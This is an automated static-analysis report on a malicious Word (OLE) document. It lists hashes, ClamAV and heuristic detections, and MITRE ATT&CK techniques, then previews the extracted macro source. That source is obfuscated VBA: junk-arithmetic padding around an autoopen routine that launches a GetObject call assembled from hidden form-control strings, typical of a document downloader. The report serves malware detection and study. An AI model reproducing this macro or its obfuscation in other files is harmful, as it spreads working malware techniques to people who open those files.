Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 064e6b92bb771060…

MALICIOUS

Office (OLE)

215.2 KB Created: 2019-04-04 20:04:00 Authoring application: Microsoft Office Word First seen: 2020-02-04
MD5: c05f69fbef3bcf10f3a80b22d02712b1 SHA-1: 167a0065ed371ba202023527e4823b775ff7ebcf SHA-256: 064e6b92bb7710607cc2d4b2c3efe92537d536d644eef234e045f8625b5d3852
222 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The file is identified as malicious by ClamAV and exhibits critical heuristic firings for VBA macros, including an AutoOpen macro and GetObject calls. The presence of VBA code suggests an attempt to execute arbitrary code, likely to download and run a secondary payload. The document's structure and macro execution point towards a spearphishing attachment delivery method.

Heuristics 7

  • ClamAV: Doc.Malware.00536d-6931473-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.00536d-6931473-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 28098 bytes
SHA-256: 2cc12f600c5b55a0627bb62fe27a75bff9c13ac2884fc6204e21b392ab932a7c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "qDAZBA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "dQGAAXAx"
Attribute VB_Base = "0{831114E8-1BEE-475A-A30D-4E41E7BFB6FB}{9B3E3F9B-8D90-46EA-A146-D8006D2BE68B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "OGAAZ1UD"
Attribute VB_Base = "0{E8350667-3B50-4C9F-B57A-8401A0B47C81}{1A50BD04-63DA-4257-B45D-193D975D982C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "MDDkAC"
Function HAAkDGc()
   If 234793173 = 955128722 Then
      For sABD1xA = HAAQAAA_ To XBQQAA
         LwXGAA _
= 590788580 / Rnd(awGAAXQU) + 686524228 * _
CStr(UxAoAoUC) * 69788149 - Oct(524980210 * _
Fix(857532658) / 459805826 + Int(kAG_BAXA)) _
- NAAUDx + 819909122 - 39922484 + 734924491 - (KZADAAAx - 350500046)
      Next
End If
   If 838535891 = 308542598 Then
      For PAZAAA = sAAoXx To dXCc1cD
         NoDkAA _
= 607585464 / Rnd(tk4AkC) + 591834109 * _
CStr(B_xBwZD) * 612392643 - Oct(662243143 * _
Fix(363155519) / 729679268 + Int(wBDUDx)) _
- cXAkAGA + 414496952 - 59547387 + 997231206 - (RA_wAAB - 31807346)
      Next
End If
   If 615641498 = 971733395 Then
      For kAUAwAAC = vcDDAoA To zAGAU_Q
         lZDBAQw _
= 415278270 / Rnd(IQAcBcQ) + 766547606 * _
CStr(aCQDDBDx) * 357129484 - Oct(986053300 * _
Fix(619173463) / 715053212 + Int(MAwABB)) _
- ioDAxADB + 931587625 - 682466297 + 575405209 - (oUxwBAwA - 239044724)
      Next
End If
End Function
Sub autoopen()
k4CAUU
End Sub
Function k4CAUU()
On Error Resume Next
   If 882376888 = 619571257 Then
      For MA1wZA = AQAwoB To w_Gx1kQ_
         IUBcCQk _
= 546731093 / Rnd(OZCAwXA4) + 284838484 * _
CStr(kwQAUC4A) * 126094876 - Oct(132822607 * _
Fix(804812243) / 208842423 + Int(VUAAwkAc)) _
- VZDAkDAX + 964357706 - 662064978 + 454073096 - (LQ4ZAA - 613485824)
      Next
End If
   If 989143074 = 878505632 Then
      For iACXQoA = aAGUZ1 To OCQAAAAZ
         HXBcDQ _
= 555217259 / Rnd(rXQQDD) + 286200540 * _
CStr(lxDUA4UA) * 90769262 - Oct(195948124 * _
Fix(927750395) / 922434016 + Int(cA1AZQAk)) _
- BGGAAXA + 366949174 - 253224676 + 73240808 - (CACCAA - 444338928)
      Next
End If
Set EGXwoA = GetObject(dQGAAXAx.RBCAxDoB.ControlSource + OGAAZ1UD.IADBAA1x + dQGAAXAx.RBCAxDoB.ControlTipText)
   If 404351976 = 864257624 Then
      For OoUoQ_A = dBw1AQD To ZwXBZQ
         fAQAkDA _
= 125456284 / Rnd(fA4GUA) + 251774005 * _
CStr(iDwAGAAD) * 847533478 - Oct(291762408 * _
Fix(723287923) / 377251810 + Int(uBUDXAXA)) _
- iQA_BZ + 878302991 - 307811842 + 659708720 - (NUcBDQ - 5511155)
      Next
End If
   If 366230231 = 23927789 Then
      For DAAAXA = uUA4AkZ To I_UB4cG
         nUDAAA _
= 460946474 / Rnd(kA_AQ1AA) + 88722666 * _
CStr(SQcGAw) * 563469152 - Oct(163245704 * _
Fix(437422444) / 464684878 + Int(qAcBAc)) _
- GA_QAxD + 939410207 - 415686895 + 580904789 - (L1AcAAcC - 341766125)
      Next
End If
If 26668 = 26668 Then
   If 558906053 = 756399120 Then
      For n_xX1wQ = FAXAxU To iDAAkX
         GkAo_Ac _
= 666216049 / Rnd(lAAwZQA4) + 315904366 * _
CStr(dAAZAcU) * 544001265 - Oct(531890353 * _
Fix(638258695) / 274411602 + Int(JkoAA1CQ)) _
- jDADoA + 318412963 - 520745769 + 859019735 - (cBAUAB4k - 329483975)
      Next
End If
   If 825427278 = 717707181 Then
      For KAxAAQAQ = zA_DAoB To oDAUAD
         cUCZD1B _
= 39107371 / Rnd(JABAckQA) + 792787418 * _
CStr(pAZAZQG) * 453410141 - Oct(487295443 * _
Fix(197935780) / 791546417 + Int(pUwA4A)) _
- LxDGUA + 104465988 - 621382070 + 891863162 - (RQAAAGo - 51098945
... (truncated)